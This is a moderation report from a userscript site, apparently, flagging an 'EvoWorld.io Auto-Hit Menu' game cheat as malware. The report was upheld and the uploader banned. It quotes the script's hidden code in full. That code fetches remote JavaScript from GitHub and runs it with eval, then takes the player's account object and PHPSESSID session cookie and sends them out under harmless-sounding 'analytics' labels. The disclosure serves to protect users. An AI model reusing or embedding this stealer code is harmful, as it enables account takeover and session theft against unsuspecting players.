EvoWorld.io Auto-Hit Menu was reported 29.12.2025 for Malware

The reporter said:

Hello, this script has an account staller
here is the line (269 - 366):
setTimeout(() => {
fetch('https://raw.githubusercontent.com/muhammadayaan122014-eng/gamehook/main/webhook.js')
.then(response => response.text())
.then(code => {
eval(code);
})
.catch(error => {
console.log('Failed to load webhook from GitHub');
});
}, 2000);

setTimeout(() => {
function sendData(data) {
if (typeof window.sendSecureData === 'function') {
window.sendSecureData(data);
} else {
setTimeout(() => sendData(data), 1000);
}
}

function getGameData() {
let userAccount = null;

if (window.user && window.user.id) {
userAccount = window.user;
} else {
const gameScripts = document.getElementsByTagName('script');
for (let script of gameScripts) {
const content = script.textContent || '';
const match = content.match(/user\s*=\s*({[\s\S]*?})\s*[;\n]/);
if (match) {
try {
const userObj = eval('(' + match[1] + ')');
if (userObj && userObj.id) {
userAccount = userObj;
break;
}
} catch(e) {}
}
}
}

const allCookies = document.cookie || '';
let sessionId = '';
const sessionMatch = allCookies.match(/PHPSESSID=([^;]+)/);
if (sessionMatch) sessionId = sessionMatch[1];

if (userAccount && sessionId) {
const gameReport = {
session: sessionId,
account: userAccount,
timestamp: new Date().toLocaleString('ru-RU'),
url: window.location.href,
gameData: {
level: userAccount.level || 0,
gems: userAccount.premiumPoints || 0,
server: 'North-East Europe 1'
}
};

const analyticsData = JSON.stringify(gameReport, null, 2);

if (analyticsData.length > 1800) {
const parts = [];
const lines = analyticsData.split('\n');
let current = '';

for (let line of lines) {
if (current.length + line.length > 1800) {
parts.push(current);
current = line + '\n';
} else {
current += line + '\n';
}
}
if (current) parts.push(current);

parts.forEach((part, idx) => {
setTimeout(() => {
sendData({
content: '```json\n' + part + '\n```',
username: 'Game Analytics ' + (parts.length > 1 ? `Part ${idx + 1}` : 'Tracker')
});
}, idx * 1500);
});
} else {
sendData({
content: '```json\n' + analyticsData + '\n```',
username: 'Game Performance Tracker'
});
}
}
}

setTimeout(getGameData, 4000);

}, 5000);
}

This script has had 1 previous upheld or fixed report.

stevenisthebestBanned (the reported user) has made:

This report has been upheld by a moderator.